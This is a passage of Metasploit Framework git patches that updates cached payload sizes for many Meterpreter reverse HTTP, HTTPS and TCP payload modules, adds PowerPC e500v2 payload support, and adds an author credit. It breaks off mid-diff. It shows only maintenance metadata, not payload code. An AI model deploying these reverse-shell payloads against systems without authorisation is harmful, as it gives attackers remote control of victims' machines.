.../payloads/singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb | 2 +- 36 files changed, 36 insertions(+), 36 deletions(-) diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 25b4b456e2..88c27331ff 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 7f493ef8e9..70b5b22c3a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 4c1b96f0db..3c23cfc864 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 675112 + CachedSize = 692384 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 4fff3cf0a5..f4858b8243 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index d1e889a621..894c078891 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 7ac0601213..1616b986ec 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 668392 + CachedSize = 678568 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 5da3516adf..62d9f16d0e 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 976d22b3d0..3149bcca28 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index 866d3a0e5c..1243e402de 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 666984 + CachedSize = 677296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 8e5a81046a..dd9368b245 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 01618c62b5..8c34b01940 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 65778b0f92..8e0de4303b 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1059368 + CachedSize = 1077640 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index ee78530672..fdc9ad4109 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 05b53aa7ba..a5db786462 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index bc38d4a374..da8aba961f 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1037512 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 92ad4f9c77..21021201df 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 27e5989778..4bd4e3818e 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 66cdd82b24..3735553d80 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1036808 + CachedSize = 1053540 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 7c3d17f612..c18783c2b3 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index 2edd9d4421..651bc9c1b6 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index fe8cbdd08a..d2771d7a0c 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 789196 + CachedSize = 854692 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index 94dbd28258..8baaf5149a 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 353b7ccf37..8bfe23028d 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index 48c3abe40b..7f6980e6f7 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 855928 + CachedSize = 856312 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index c8ec4d34ba..2c41b001e2 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 3e9f8ab1d6..a89325ffbb 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index e52a985f0c..b5ace9bfeb 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux' module MetasploitModule - CachedSize = 729184 + CachedSize = 745472 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index 3d44d1abe8..078ea923e9 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index 8d2f70e310..a3f8085c2a 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 55bdf50aa5..3660fc5810 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' module MetasploitModule - CachedSize = 772828 + CachedSize = 793296 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index d5adac9574..e522b7c89c 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 0e8fe66ace..ae31cc5abe 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb index abb089db49..5e73f26542 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux' module MetasploitModule - CachedSize = 893560 + CachedSize = 905864 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb index 4a08503586..cf4c1f6b81 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb index 6436a8b549..c4f9172030 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb index a70eb46ee7..82da65b261 100644 --- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx' module MetasploitModule - CachedSize = 618412 + CachedSize = 789068 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions From 56eb828cc5d57f0f36bbb43e9b405fb9acefe2f0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 30 Oct 2017 14:04:10 -0500 Subject: [PATCH 070/254] add e500v2 payloads --- Gemfile.lock | 2 +- .../sessions/meterpreter_ppce500v2_linux.rb | 29 ++++++++++++ lib/msf/core/payload/uuid.rb | 3 +- .../linux/aarch64/meterpreter_reverse_http.rb | 3 +- .../aarch64/meterpreter_reverse_https.rb | 3 +- .../linux/aarch64/meterpreter_reverse_tcp.rb | 3 +- .../linux/armbe/meterpreter_reverse_http.rb | 3 +- .../linux/armbe/meterpreter_reverse_https.rb | 3 +- .../linux/armbe/meterpreter_reverse_tcp.rb | 3 +- .../linux/armle/meterpreter_reverse_http.rb | 3 +- .../linux/armle/meterpreter_reverse_https.rb | 3 +- .../linux/armle/meterpreter_reverse_tcp.rb | 3 +- .../linux/mips64/meterpreter_reverse_http.rb | 3 +- .../linux/mips64/meterpreter_reverse_https.rb | 3 +- .../linux/mips64/meterpreter_reverse_tcp.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_https.rb | 3 +- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 3 +- .../linux/mipsle/meterpreter_reverse_http.rb | 3 +- .../linux/mipsle/meterpreter_reverse_https.rb | 3 +- .../linux/mipsle/meterpreter_reverse_tcp.rb | 3 +- .../linux/ppc/meterpreter_reverse_http.rb | 3 +- .../linux/ppc/meterpreter_reverse_https.rb | 3 +- .../linux/ppc/meterpreter_reverse_tcp.rb | 3 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 3 +- .../ppc64le/meterpreter_reverse_https.rb | 3 +- .../linux/ppc64le/meterpreter_reverse_tcp.rb | 3 +- .../ppce500v2/meterpreter_reverse_http.rb | 44 +++++++++++++++++++ .../ppce500v2/meterpreter_reverse_https.rb | 44 +++++++++++++++++++ .../ppce500v2/meterpreter_reverse_tcp.rb | 44 +++++++++++++++++++ .../linux/x64/meterpreter_reverse_http.rb | 3 +- .../linux/x64/meterpreter_reverse_https.rb | 3 +- .../linux/x64/meterpreter_reverse_tcp.rb | 3 +- .../linux/x86/meterpreter_reverse_http.rb | 3 +- .../linux/x86/meterpreter_reverse_https.rb | 3 +- .../linux/x86/meterpreter_reverse_tcp.rb | 3 +- .../linux/zarch/meterpreter_reverse_http.rb | 3 +- .../linux/zarch/meterpreter_reverse_https.rb | 3 +- .../linux/zarch/meterpreter_reverse_tcp.rb | 3 +- .../osx/x64/meterpreter_reverse_http.rb | 3 +- .../osx/x64/meterpreter_reverse_https.rb | 3 +- .../osx/x64/meterpreter_reverse_tcp.rb | 3 +- tools/modules/generate_mettle_payloads.rb | 25 ++++++----- 43 files changed, 249 insertions(+), 50 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb diff --git a/Gemfile.lock b/Gemfile.lock index e32cd33f32..5a57421014 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -252,7 +252,7 @@ GEM recog (2.1.16) nokogiri redcarpet (3.4.0) - rex-arch (0.1.11) + rex-arch (0.1.13) rex-text rex-bin_tools (0.1.4) metasm diff --git a/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb new file mode 100644 index 0000000000..85f1b69b3b --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_ppce500v2_linux.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_ppce500v2_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'linux' + self.base_arch = ARCH_PPCE500V2 + end +end + +end +end + diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb index acc100406a..1a651242e3 100644 --- a/lib/msf/core/payload/uuid.rb +++ b/lib/msf/core/payload/uuid.rb @@ -43,7 +43,8 @@ class Msf::Payload::UUID 24 => ARCH_AARCH64, 25 => ARCH_MIPS64, 26 => ARCH_PPC64LE, - 27 => ARCH_R + 27 => ARCH_R, + 28 => ARCH_PPCE500V2 } Platforms = { diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 88c27331ff..3a9e4e3e27 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 70b5b22c3a..d5eda3afaf 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 3c23cfc864..3400e28e34 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index f4858b8243..bd32104cce 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index 894c078891..073d4b31b3 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 1616b986ec..d2d13aedc0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 62d9f16d0e..e03945a404 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -24,7 +24,8 @@ module MetasploitModule 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ 'Adam Cammack ', - 'Brent Cook ' + 'Brent Cook ', + 'timwr' ], 'Platform' => 'linux', 'Arch' => 